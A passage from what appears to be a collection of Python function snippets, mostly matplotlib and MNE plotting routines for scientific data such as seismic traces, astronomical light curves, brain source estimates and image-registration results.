plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def generate_plots(fixed, moving, warped, flows, train_loss, val_loss, reg_loss, epoch):\n moving = moving.detach().cpu().numpy()\n fixed = fixed.detach().cpu().numpy()\n warped = [w.detach().cpu().numpy() for w in warped]\n flows = [f.detach().cpu().numpy() for f in flows]\n\n fig = plt.figure(constrained_layout=True, figsize=(4 * 5, 4 * 3))\n ax_dict = fig.subplot_mosaic(\"\"\"\n FABCD\n LGHIE\n MKJWX\n \"\"\")\n\n ax_dict['F'].imshow(moving[0, 0, ...], cmap='gray')\n ax_dict['F'].set_title('Moving')\n\n ax_dict['W'].imshow(fixed[0, 0, ...], cmap='gray')\n ax_dict['W'].set_title('Fixed')\n\n for i, ax_name in enumerate(list(\"ABCDEX\")):\n ax_dict[ax_name].imshow(warped[i][0, 0, ...], cmap='gray')\n if ax_name == \"A\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n ax_dict['L'].plot(train_loss, color='red', label='train_loss')\n ax_dict['L'].plot(val_loss, label='val_loss', color='blue')\n ax_dict['L'].plot(reg_loss, label='train_reg_loss', color='green')\n ax_dict['L'].set_title(\"Losses\")\n ax_dict['L'].grid()\n ax_dict['L'].set_xlim(0, args.e)\n ax_dict['L'].legend(loc='upper right')\n ax_dict['L'].scatter(len(train_loss) - 1, train_loss[-1], s=20, color='red')\n ax_dict['L'].scatter(len(val_loss) - 1, val_loss[-1], s=20, color='blue')\n ax_dict['L'].scatter(len(reg_loss) - 1, reg_loss[-1], s=20, color='green')\n\n for i, ax_name in enumerate(list(\"GHIJKM\")):\n plot_grid(ax_dict[ax_name], flows[i][0, ...])\n if ax_name == \"G\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n plt.suptitle(f\"Epoch {epoch}\")\n plt.savefig(f'./ckp/visualization/epoch_{epoch}.png')", "def fig_event_corrected(evstream, TF_list, fmin=1./150., fmax=2.):\n\n # Unpack vertical trace and filter\n trZ = evstream.trZ.copy()\n trZ.filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n sr = trZ.stats.sampling_rate\n taxis = np.arange(0., trZ.stats.npts/sr, 1./sr)\n\n plt.figure(figsize=(8, 8))\n\n plt.subplot(611)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['Z1']:\n tr = Trace(\n data=evstream.correct['Z1'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.key + ' ' + evstream.tstamp +\n ': Z1', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(612)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['Z2-1']:\n tr = Trace(\n data=evstream.correct['Z2-1'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': Z2-1', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(613)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZP-21']:\n tr = Trace(\n data=evstream.correct['ZP-21'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZP-21', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(614)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZH']:\n tr = Trace(\n data=evstream.correct['ZH'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZH', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(615)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZP-H']:\n tr = Trace(\n data=evstream.correct['ZP-H'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZP-H', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(616)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZP']:\n tr = Trace(\n data=evstream.correct['ZP'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZP', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.xlabel('Time since earthquake (sec)')\n plt.tight_layout()\n\n return plt", "def demo(self, tmin=0, tmax=27.4, cadence=30.0 / 60.0 / 24.0, offset=0, raw=False, ax=None):\n t = np.arange(tmin, tmax, cadence)\n if ax is None:\n plt.figure('demo', figsize=(8, 3))\n else:\n plt.sca(ax)\n y = self.model(t)\n if raw:\n plt.plot(t, y + offset, alpha=0.25, linewidth=1, color='royalblue')\n plt.plot(t, self.integrated(t) + offset, alpha=0.5, linewidth=1, color='darkorange')\n plt.xlim(tmin, tmax)\n # plt.ylim(np.max(y)+0.01, np.min(y)-0.01)\n plt.xlabel('Time (days)')\n plt.ylabel('Flux (mag.)')", "def plot():\n pass", "def plot(self, *filters, output=\"lightcurve.png\", title=None, \n tmerger=None, show_legend=True, connect=True, text=None,\n mag_min=None, mag_max=None, \n limmag_min=None, limmag_max=None, \n refmag_min=None, refmag_max=None):\n \n if (len(self.__mags) == 0) and (len(self.__lim_mags) == 0):\n raise ValueError(\"LightCurve object has no magnitude or limiting \"+\n \"magnitude data points; cannot plot\")\n \n plotted_filts = [] # keep track of filters which have been plot already\n \n self.__mags.sort(\"MJD\")\n self.__lim_mags.sort(\"MJD\")\n self.__ref_mags.sort(\"MJD\")\n \n ## plot magnitudes and their errors\n if len(self.__mags) > 0:\n sources = self.__mags \n \n if filters: # if a filters argument is given\n mask = (sources[\"filter\"] == filters[0])\n for filt in filters[1:]:\n mask += (sources[\"filter\"] == filt)\n sources = sources[mask] # only use those filters \n # if limits on magnitudes \n if mag_min:\n sources = sources[sources[\"mag_calib\"] < mag_min]\n if mag_max:\n sources = sources[sources[\"mag_calib\"] > mag_max] \n \n if tmerger: # if a t=0 is given\n t = [tim - tmerger for tim in sources[\"MJD\"].data]\n else:\n t = sources[\"MJD\"].data\n \n # magnitudes and their errors\n mag = sources[\"mag_calib\"].data\n mag_err = sources[\"mag_calib_unc\"].data\n \n # plot them \n fig = plt.figure(figsize=(14,10))\n for i in range(len(t)): \n filt = str(sources[\"filter\"].data[i])\n color, form = self.__plot_instructions[filt]\n if filt in plotted_filts:\n plt.errorbar(t[i], mag[i], mag_err[i], fmt=form, mfc=color, \n mec=\"black\", mew=2.0, ls=\"\", color=\"black\", \n ms=18.0, zorder=4)\n else:\n plt.errorbar(t[i], mag[i], mag_err[i], fmt=form, mfc=color, \n mec=\"black\", mew=2.0, ls=\"\", color=\"black\", \n label=filt, ms=18.0, zorder=4)\n plotted_filts.append(filt)\n \n if connect:\n for f in plotted_filts:\n mask = self.__mags[\"filter\"] == f\n color, __ = self.__plot_instructions[f]\n trelevant = np.array(t)[mask]\n magrelevant = np.array(mag)[mask]\n plt.plot(trelevant, magrelevant, marker=\"\", ls=\"-\", \n lw=2.0, zorder=0, color=color, alpha=0.6)\n \n ## plot limiting magnitudes \n if len(self.__lim_mags) > 0:\n lims = self.__lim_mags\n \n if filters: # if a filters argument is given\n mask = (lims[\"filter\"] == filters[0])\n for filt in filters[1:]:\n mask += (lims[\"filter\"] == filt)\n lims = lims[mask] # only use those filters\n\n # if limits on limiting magnitudes \n if limmag_min:\n lims = lims[lims[\"mag_calib\"] < limmag_min]\n if limmag_max:\n lims = lims[lims[\"mag_calib\"] > limmag_max] \n\n if tmerger: # if a t=0 is given\n t = [tim - tmerger for tim in lims[\"MJD\"].data]\n else:\n t = lims[\"MJD\"].data\n \n # limiting magnitudes\n mag = lims[\"mag_calib\"].data\n \n # plot them\n for i in range(len(lims)): \n filt = str(lims[\"filter\"].data[i])\n color, form = self.__plot_instructions_lim_mags[filt]\n if filt in plotted_filts:\n plt.plot(t[i], mag[i], marker=form, mfc=color, mec=\"black\", \n mew=2.0, ls=\"\", ms=24.0, zorder=3) \n else:\n plt.plot(t[i], mag[i], marker=form, mfc=color, mec=\"black\", \n mew=2.0, ls=\"\", label=filt, ms=24.0, zorder=3) \n plotted_filts.append(filt) \n\n ## plot reference magnitudes \n if len(self.__ref_mags) > 0:\n refs = self.__ref_mags\n \n if filters: # if a filters argument is given\n mask = (refs[\"filter\"] == filters[0])\n for filt in filters[1:]:\n mask += (refs[\"filter\"] == filt)\n refs = refs[mask] # only use those filters\n\n # if limits on reference magnitudes \n if refmag_min:\n refs = refs[refs[\"mag_calib\"] < refmag_min]\n if refmag_max:\n refs = refs[refs[\"mag_calib\"] > refmag_max] \n \n if tmerger: # if a t=0 is given\n t = [tim - tmerger for tim in refs[\"MJD\"].data]\n else:\n t = refs[\"MJD\"].data\n \n # refence magnitudes and their errors\n mag = refs[\"mag_calib\"].data\n mag_err = refs[\"mag_calib_unc\"].data\n \n # plot them \n for i in range(len(t)): \n filt = str(refs[\"filter\"].data[i])\n color = self.__plot_instructions_ref_mags[filt]\n if filt in plotted_filts:\n plt.axhline(mag[i], color=color, ls=\"-\", lw=3.0, zorder=2)\n else:\n plt.axhline(mag[i], color=color, ls=\"-\", lw=3.0,\n label=filt, zorder=2)\n \n if mag_err[i]:\n x0, xf = plt.xlim()\n rect = ptc.Rectangle([x0, mag[i]-mag_err[i]], \n width=xf-x0, height=2.0*mag_err[i],\n alpha=0.2, color=color,\n zorder=1)\n plt.gca().add_patch(rect)\n plotted_filts.append(filt) \n \n\n\n ## show the legend\n if show_legend:\n # remove duplicate labels/handles \n handles, labels = plt.gca().get_legend_handles_labels()\n temp_dict = dict(zip(labels, handles))\n # reorder labels from shortest wavelength to longest \n valid_filts = VALID_PHOT_FILTS.copy()\n new_labels = []; new_handles = []\n while len(valid_filts) > 0:\n if valid_filts[0] in labels:\n new_labels.append(valid_filts[0])\n new_handles.append(temp_dict[valid_filts[0]])\n valid_filts = valid_filts[1:] \n by_label = OrderedDict(zip(new_labels,new_handles))\n ax = plt.gca() # get current axes\n box = ax.get_position()\n ax.set_position([box.x0, box.y0 + box.height * 0.1, \n box.width, box.height * 0.9])\n ax.legend(by_label.values(), by_label.keys(), \n #loc=\"lower center\", \n #bbox_to_anchor=(0.5, -0.15), \n loc=\"center right\",\n bbox_to_anchor=(1.13, 0.5),\n fontsize=18, \n ncol=1, fancybox=True)\n \n ## titles and axis labels \n if title: # set it\n plt.title(title, fontsize=18)\n if tmerger:\n plt.xlabel(r\"$t - t_{\\mathrm{merger}}$\"+\" [days]\", fontsize=18)\n else:\n plt.xlabel(\"MJD\", fontsize=18) \n plt.ylabel(\"Magnitude (AB)\", fontsize=18)\n plt.gca().invert_yaxis() # invert so brighter stars higher up \n plt.grid()\n \n ## ticks\n plt.tick_params(axis='both', which='major', labelsize=20)\n plt.gca().xaxis.set_ticks_position(\"both\") # ticks on both sides\n plt.gca().yaxis.set_ticks_position(\"both\")\n \n ## text box\n if text:\n plt.text(text[0], text[1], text[2], fontsize=18)\n \n if output:\n plt.savefig(output, bbox_inches=\"tight\")\n \n return fig", "def plot_hovmoller(self, zi=10):\n fig, axes = plt.subplots(nrows=3)\n ax_avg, ax_U, ax_Uf = axes\n\n self.mean_velocity_Uf(ax_avg)\n ax_avg.axhline(zi, linewidth=2, color='black')\n\n ax_U.set_title('Hovmoller of streamwise velocity')\n hovmoller_U = self.hovmoller(ax_U, quantity=self.u)\n # over plot line of detected front passage\n # FIXME: this x should be from self\n x = np.indices((self.u.shape[1],)).squeeze()\n tf = self.tf\n ax_U.plot(tf(x), x, label='detected front')\n\n ax_U.set_title('Hovmoller of shifted streamwise velocity')\n self.hovmoller(ax_Uf, quantity=self.uf)\n # over plot line of detected front passage\n ax_Uf.axvline(-self.front_offset, label='detected front')\n\n ax_U.legend()\n ax_Uf.legend()\n\n # make space for shared colorbar\n fig.tight_layout(rect=(0, 0, 0.9, 1))\n cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])\n fig.colorbar(hovmoller_U, cax=cax, use_gridspec=True)\n\n return fig", "def quick_plot(solution):\n plt.suptitle('GNLSE solution')\n\n plt.subplot(1, 2, 1)\n plot_wavelength_vs_distance(solution)\n\n plt.subplot(1, 2, 2)\n plot_delay_vs_distance(solution)\n\n plt.show()", "def plot_rand(txyxidata, b,X, outfile):\r\n\t\r\n\tme = \"LE_Plot.plot_rand: \"\r\n\tif os.path.isfile(outfile): return me+\"skip\"\r\n\tt0 = time.time()\r\n\tshowplot = False\r\n\t\r\n\tt, x, eta, xi = txyxidata\r\n\tdel txyxidata\r\n\ttmax = np.ceil(t.max())\r\n\t\r\n\t## Plot walk\r\n\tfs = 25\r\n\twinsize = int(tmax/80)\r\n\tfig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\r\n\tfig.suptitle(outfile)#+\"\\n\"+str(argv)[1:-1])\r\n\tenvelope_plot(t, xi, winsize, ax=ax1)\r\n\tax1.set_ylabel(\"$\\\\xi$\",fontsize=fs)\r\n\tenvelope_plot(t, eta, winsize, ax=ax2)\r\n\tax2.set_ylabel(\"$\\eta$\",fontsize=fs)\r\n\tenvelope_plot(t, x, winsize, ax=ax3)\r\n\tax3.plot([0,t.max()],[X,X],\"k--\"); ax3.plot([0,t.max()],[-X,-X],\"k--\")\r\n\tax3.set_xlabel(\"$t$\",fontsize=fs);ax3.set_ylabel(\"$x$\",fontsize=fs)\r\n\tetalim = np.ceil(abs(eta).max())\t## Not perfect\r\n\t#fig.tight_layout()\r\n\tplt.savefig(outfile)\r\n\tprint me+\"Plot saved as\",outfile\r\n\tprint me+\"Plotting random data:\",round(time.time()-t0,1),\"seconds\"\r\n\tif showplot:\t\tplt.show()\t\r\n\t\r\n\tplt.close(fig)\t\r\n\treturn", "def peek(self, **kwargs):\n\n plt.figure()\n axes = plt.gca()\n data_lab=self.meta['OBS-FREQ'][0:2] + ' ' + self.meta['OBS-FREQ'][2:5]\n axes.plot(self.data.index,self.data,label=data_lab)\n axes.set_yscale(\"log\")\n axes.set_ylim(1e-4,1)\n axes.set_title('Nobeyama Radioheliograph')\n axes.set_xlabel('Start time: ' + self.data.index[0].strftime(TIME_FORMAT))\n axes.set_ylabel('Correlation')\n axes.legend()\n plt.show()", "def LE_SimPlt(b,X,timefac,BW,smooth):\r\n\tme = \"LE_Plot.LE_SimPlt: \"\r\n\t\r\n\tprint \"\\n== \"+me+\"b =\",b,\" X =\",X,\" BW =\",BW,\"==\\n\"\r\n\t\r\n\tt0 = time.time()\r\n\t\r\n\t## Filenames\r\n\ttrafile, rndfile, pdffile, strfile, n = get_filenames(b,X,timefac,BW)\r\n\t\r\n\t## GET_TRADATA\r\n\t## Time-series / trajectory data: load or simulate\r\n\ttry:\t\t\r\n\t\ttxyxidata = np.load(trafile+\".npy\")[:n,:]\r\n\t\tprint me+\"Trajectory file found\",trafile+\".npy\"\r\n\texcept IOError:\r\n\t\tprint me+\"No trajectory file found. Simulating...\"\r\n\t\ttxyxidata = LE_Simulate.LEsim(b,X,timefac,BW)\r\n\t\t\r\n\tprint me,collect()\r\n\t\r\n\t## GET_STRDATA\r\n\t## Interpolated current data: load or calculate\r\n\ttry:\r\n\t\tA = np.load(strfile+\".npy\"); grd = A.shape[1]\r\n\t\tx,y,gvx,gvy = A[0],A[1],A[2:grd+2],A[grd+2:]\r\n\t\toargs = np.loadtxt(strfile+\".hdr\")\r\n\t\tprint me+\"Steamgrid file found\",strfile+\".npy\"\r\n\texcept IOError:\r\n\t\tprint me+\"No streamgrid file found. Calculating...\"\r\n\t\tx,y,gvx,gvy,oargs = calc_grid(txyxidata[1:3], b,X, strfile, BW)\r\n\r\n\tprint me,collect()\r\n\t\r\n\t\r\n\t## Plots\r\n\t# plot_rand(txyxidata, b,X, rndfile)\r\n\t# print me,collect()\r\n\tplot_pdf(txyxidata[1:3], b,X, pdffile)\r\n\tprint me,collect()\r\n\tplot_stream( x,y,gvx,gvy,np.append(oargs,smooth), strfile )\r\n\tprint me,collect()\r\n\t\r\n\tprint me+\"Total time\",round(time.time()-t0,1),\"seconds\"\t\r\n\treturn", "def _update_plot(self):\n\n self.T_ex[:-1] = self.T_ex[1:]\n self.T_ex[-1] = self.ensemble.T_ex\n self.plot_T_ex[0].set_ydata(self.T_ex)\n self.T_kin[:-1] = self.T_kin[1:]\n self.T_kin[-1] = self.ensemble.T_kin\n self.plot_T_kin[0].set_ydata(self.T_kin)\n self.canvas.draw()\n\n renderer = self.canvas.get_renderer()\n raw_data = renderer.tostring_rgb()\n surf = pygame.image.fromstring(raw_data,\n (self.plot_width, self.disp_height),\n \"RGB\")\n self.game_display.blit(surf, (self.disp_width, 0))", "def plotsources(self): \n mainDir = Inverse.mainDir\n folder_name = self.folder_name\n os.chdir(mainDir)\n \n folder = os.listdir(u'.')\n subfolders = [f for f in folder if f[0] == 'S']\n\n for subject in subfolders:\n # go to the directory\n curdir = os.path.join(mainDir, subject)\n os.chdir(curdir)\n # locate source files\n stcfiles = glob.glob('*-rh.stc')\n\n for ii, fname in enumerate(stcfiles):\n # read the source files\n print(fname)\n stc = mne.read_source_estimate(os.path.join(curdir, fname))\n plottitle = fname.split('_c')[0]\n\n try:# plot the surface\n # Get labels for FreeSurfer 'aparc' cortical parcellation with 34 labels/hemi\n labels_parc = mne.read_labels_from_annot(subject, parc='aparc', subjects_dir = mainDir)\n\n # plot the sources\n brain = stc.plot(subject=subject, surface='pial', hemi='both', colormap='auto',\n time_label='auto', smoothing_steps=10, transparent=True, alpha=0.8,\n time_viewer=False, subjects_dir=None, figure=None, views='dor',\n colorbar=True, clim='auto', cortex='classic', size=800, background='black',\n foreground='white',\n initial_time = self.initial_time, time_unit='s', backend='auto', spacing='oct5')\n\n vertno_max, time_max = stc.get_peak(hemi='lh')\n brain.add_foci(vertno_max, coords_as_verts=True, hemi='lh', color='red')\n\n vertno_max_rh, time_max_rh = stc.get_peak(hemi='rh')\n brain.add_foci(vertno_max_rh, coords_as_verts=True, hemi='rh', color='blue')\n\n brain.add_text(0.1, 0.9, plottitle, 'title', font_size=36)\n\n except Exception as errMessage:\n print('Something went wrong with subject >>>', fname)\n print(errMessage)\n pass\n \"\"\"\n views : str | list\n View to use. See surfer.Brain(). Supported views: ['lat', 'med', 'fos',\n 'cau', 'dor' 'ven', 'fro', 'par']. Using multiple views is not\n supported for mpl backend.\n \"\"\"\n labelo = []\n try:\n #brain.add_annotation\n labelo.append([label for label in labels_parc if label.name == 'postcentral-lh'][0])\n labelo.append([label for label in labels_parc if label.name == 'postcentral-rh'][0])\n labelo.append([label for label in labels_parc if label.name == 'precentral-lh'][0] )\n labelo.append([label for label in labels_parc if label.name == 'precentral-rh'][0] )\n# labelo.append([label for label in labels_parc if label.name == 'inferiorparietal-lh'][0])\n# labelo.append([label for label in labels_parc if label.name == 'inferiorparietal-rh'][0])\n# labelo.append([label for label in labels_parc if label.name == 'superiorfrontal-rh'][0])\n# labelo.append([label for label in labels_parc if label.name == 'superiorfrontal-lh'][0])\n\n for label in labelo:\n brain.add_label(label, borders=1)\n\n except Exception as errMessage:\n print(errMessage)\n pass\n\n try: # make a directory called 'results'\n os.mkdir(os.path.join(curdir, folder_name))\n except Exception as errMessage:\n print(errMessage)\n\n finally:\n os.chdir(os.path.join(curdir, folder_name))\n brain.save_image(fname.split('_c')[0])\n brain.close()\n\n os.chdir(mainDir)", "def __init__(self, object_stream, dpi=100, width=7, height=6.5,\r\n point_size=1, point_color='b', show_labels=True, radius=0,\r\n interval=20, blit=False):\r\n\r\n super().__init__(object_stream=object_stream, dpi=dpi, width=width,\r\n height=height)\r\n \r\n # adjust for axis size\r\n scale = self.ax.get_ylim()[1] - self.ax.get_ylim()[0]\r\n self.point_size = point_size * scale / 100\r\n self.point_color = point_color\r\n\r\n self.timer = self.ax.text(0.02, 0.5, '0', fontsize=15,\r\n transform=plt.gcf().transFigure)\r\n\r\n self.show_labels = show_labels\r\n if (isinstance(radius,int) or isinstance(radius,float)) and radius>0:\r\n self.radius = radius * scale / 100\r\n else:\r\n self.radius = {v_id:r * scale / 100 for v_id, r in radius.items()}\r\n\r\n self.interval = interval\r\n self.blit = blit", "def plot_visualize_mft_sources(fwdmag, stcdata, tmin, tstep,\n subject, subjects_dir):\n print(\"##### Attempting to plot:\")\n # cf. decoding/plot_decoding_spatio_temporal_source.py\n vertices = [s['vertno'] for s in fwdmag['src']]\n if len(vertices) == 1:\n vertices = [fwdmag['src'][0]['vertno'][fwdmag['src'][0]['rr'][fwdmag['src'][0]['vertno']][:, 0] <= -0.],\n fwdmag['src'][0]['vertno'][fwdmag['src'][0]['rr'][fwdmag['src'][0]['vertno']][:, 0] > -0.]]\n elif len(vertices) > 2:\n warnings.warn('plot_visualize_mft_sources(): Cannot handle more than two sources spaces')\n return\n\n stc_feat = SourceEstimate(stcdata, vertices=vertices,\n tmin=tmin, tstep=tstep, subject=subject)\n itmaxsum = np.argmax(np.sum(stcdata, axis=0))\n twmin = tmin + tstep * float(itmaxsum - stcdata.shape[1] / 20)\n twmax = tmin + tstep * float(itmaxsum + stcdata.shape[1] / 20)\n for ihemi, hemi in enumerate(['lh', 'rh', 'both']):\n brain = stc_feat.plot(surface='white', hemi=hemi, subjects_dir=subjects_dir,\n transparent=True, clim='auto')\n # use peak getter to move visualization to the time point of the peak\n print(\"Restricting peak search to [%fs, %fs]\" % (twmin, twmax))\n if hemi == 'both':\n brain.show_view('parietal')\n vertno_max, time_idx = stc_feat.get_peak(hemi=None, time_as_index=True,\n tmin=twmin, tmax=twmax)\n else:\n brain.show_view('lateral')\n vertno_max, time_idx = stc_feat.get_peak(hemi=hemi, time_as_index=True,\n tmin=twmin, tmax=twmax)\n print(\"hemi=%s: setting time_idx=%d\" % (hemi, time_idx))\n brain.set_data_time_index(time_idx)\n if hemi == 'lh' or hemi == 'rh':\n # draw marker at maximum peaking vertex\n brain.add_foci(vertno_max, coords_as_verts=True, hemi=hemi, color='blue',\n scale_factor=0.6)\n\n if len(fwdmag['src']) > ihemi:\n fwds = fwdmag['src'][ihemi]\n comax = fwds['rr'][vertno_max]\n print(\"hemi=%s: vertno_max=%d, time_idx=%d fwdmag['src'][%d]['rr'][vertno_max] = \" % \\\n (hemi, vertno_max, time_idx, ihemi), comax)\n\n offsets = np.append([0], [s['nuse'] for s in fwdmag['src']])\n if hemi == 'lh':\n ifoci = [np.nonzero([stcdata[0:offsets[1], time_idx] >= 0.25 * np.max(stcdata[:, time_idx])][0])]\n elif len(fwdmag['src']) > 1:\n ifoci = [np.nonzero([stcdata[offsets[1]:, time_idx] >= 0.25 * np.max(stcdata[:, time_idx])][0])]\n vfoci = fwds['vertno'][ifoci[0][0]]\n cfoci = fwds['rr'][vfoci]\n print(\"Coords of %d sel. vfoci: \" % cfoci.shape[0])\n print(cfoci)\n print(\"vfoci: \")\n print(vfoci)\n print(\"brain.geo[%s].coords[vfoci] : \" % hemi)\n print(brain.geo[hemi].coords[vfoci])\n\n mrfoci = np.zeros(cfoci.shape)\n invmri_head_t = invert_transform(fwdmag['info']['mri_head_t'])\n mrfoci = apply_trans(invmri_head_t['trans'], cfoci, move=True)\n print(\"mrfoci: \")\n print(mrfoci)\n\n # Just some blops along the coordinate axis:\n # This will not yield reasonable results w an inflated brain.\n # bloblist = np.zeros((300,3))\n # for i in xrange(100):\n # bloblist[i,0] = float(i)\n # bloblist[i+100,1] = float(i)\n # bloblist[i+200,2] = float(i)\n # mrblobs = apply_trans(invmri_head_t['trans'], bloblist, move=True)\n # brain.add_foci(mrblobs, coords_as_verts=False, hemi=hemi, color='yellow', scale_factor=0.3)\n brain.save_image('testfig_map_%s.png' % hemi)\n brain.close()", "def psfminusmodel_plot(epoch, model, features, filters, figname, fgal=0.5,\n idx=-1):\n # fetch Stripe 82 data\n X, Xcov = fetch_prepped_s82data(epoch, fgal, features, filters)\n Xcoadd, Xcoaddcov = fetch_prepped_s82data(epoch, fgal, features,\n filters, use_single=False)\n\n # unpickle the XD model\n if type(model) == str: \n f = open(model, 'rb')\n model = cPickle.load(f)\n f.close()\n\n fs = 5\n Nbins = [50, 50, 50]\n lsize = 20\n mags = [19.5, 20.5, 21.5]\n dlt = [0.15, 0.15, 0.15]\n f = pl.figure(figsize=(3 * fs, fs))\n pl.subplots_adjust(wspace=0.3)\n for i in range(len(mags)):\n ind = (Xcoadd[:, idx] < 0.03) & (Xcoadd[:, 0] > mags[i] - dlt[i])\n ind = ind & (Xcoadd[:, 0] <= mags[i] + dlt[i])\n\n x = X[ind]\n xc = Xcov[ind]\n\n a, m, v = model.posterior(x, xc)\n posts = np.zeros_like(x)\n for j in range(x.shape[0]):\n posts[j] = np.median(model.sample(a[j], m[j], v[j], size=1000),\n axis=0)\n\n ax = pl.subplot(1, 3, i + 1)\n h, b = np.histogram(x[:, idx], Nbins[i])\n d = (b[1] - b[0]) / 2.\n b = np.append([b[0] - d], b[:-1] + d)\n h = np.append([1.0], h)\n pl.plot(b, h, drawstyle='steps-mid', linestyle='dotted',\n color='k', lw=2)\n h, b = np.histogram(posts[:, idx], Nbins[i])\n d = (b[1] - b[0]) / 2.\n b = np.append([b[0] - d], b[:-1] + d)\n h = np.append([1.0], h)\n pl.plot(b, h, drawstyle='steps-mid', color='k', lw=2)\n pl.xlabel('psfmag - modelmag $r$', fontsize=lsize)\n pl.ylabel('counts', fontsize=lsize)\n ax.text(0.95, 0.95, '$r=%0.1f$' % mags[i], fontsize=lsize, ha='right',\n va='top', transform=ax.transAxes)\n pl.xlim(-0.1, 0.2)\n f.savefig(figname, bbox_inches='tight')", "def flareplot_template(df, jsonpath):\n #'track' entry for json file: each track is a node (position) in the flareplot\n helix_colors = {'1':\"#78C5D5\",'12':\"#5FB0BF\",'2':\"#459BA8\",'23':\"#5FAF88\",'3':\"#79C268\",'34':\"#9FCD58\",'4':\"#C5D747\",'45':\"#DDD742\",'5':\"#F5D63D\",'56':\"#F3B138\",'6':\"#F18C32\",'67':\"#ED7A6A\",'7':\"#E868A1\",'78':\"#D466A4\",'8':\"#BF63A6\",'Ligand--1':'#FF5050', 'Ligand': '#FF5050'} \n allpos = set(df['Position1']).union(set(df['Position2']))\n tracks = [{\n 'trackLabel': 'Degree centrality',\n \"trackProperties\": []\n }]\n trees = [{\n 'treeLabel': 'Helices',\n 'treePaths': []\n }]\n \n #Add ligand\n tracks[0]['trackProperties'].append({\n 'color' : \"#FF5050\",\n 'size' : 1.0,\n 'nodeName': 'Ligand'\n })\n trees[0]['treePaths'].append([1, 'Ligand'])\n \n setpos = set()\n for multipos in allpos:\n if multipos.startswith('Ligand'):\n continue\n \n split_pos = multipos.split('x')\n for pos in split_pos:\n if split_pos.index(pos) == 0:\n helix = pos\n color = helix_colors[helix]\n else: \n real_pos = helix+'x'+pos\n if real_pos not in setpos:\n trackprop = {\n 'color' : color,\n 'size' : 1.0,\n 'nodeName': real_pos\n }\n if len(helix) == 2:\n newhelix = int(helix[0]) + int(helix[1])\n trees[0]['treePaths'].append([newhelix, real_pos])\n else:\n newhelix = int(helix)*2\n trees[0]['treePaths'].append([newhelix, real_pos])\n\n tracks[0]['trackProperties'].append(trackprop)\n setpos.add(real_pos)\n\n #Sort trees\n treePaths_sorted = sorted(list(trees[0]['treePaths']), key=lambda l: (l[0],l[1]))\n treePaths_sorted = [ str(x[0])+\".\"+x[1] for x in treePaths_sorted ]\n trees[0]['treePaths'] = treePaths_sorted\n \n #Output jsondict to store\n jsondict = { 'trees' : trees, 'tracks' : tracks }\n \n # Store json file\n jsonpath = basepath + \"template.json\" \n with open(jsonpath, 'w') as jsonfile:\n dump(jsondict, jsonfile, ensure_ascii=False, indent = 4)", "def plot_img():\n plt.subplot(121)\n plt.imshow(data.data.numpy()[0,].squeeze())\n plt.subplot(122)\n plt.imshow(dec_mean.view(-1,28,28).data.numpy()[0,].squeeze())\n\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()\n sample = model.sample_z(data) \n plt.imshow(sample)", "def _display_from_tsne(self, x, y):\n\n # Find the closest 9\n inds = np.argsort(np.sum( (self._Y_tsne-np.array([x, y]))**2, axis=1))\n print(inds[:10])\n\n # Plot the green circles on the tsne plot\n self._display_tsne()\n self._tsne_window.plot(self._Y_tsne[inds[:9],0], self._Y_tsne[inds[:9],1], 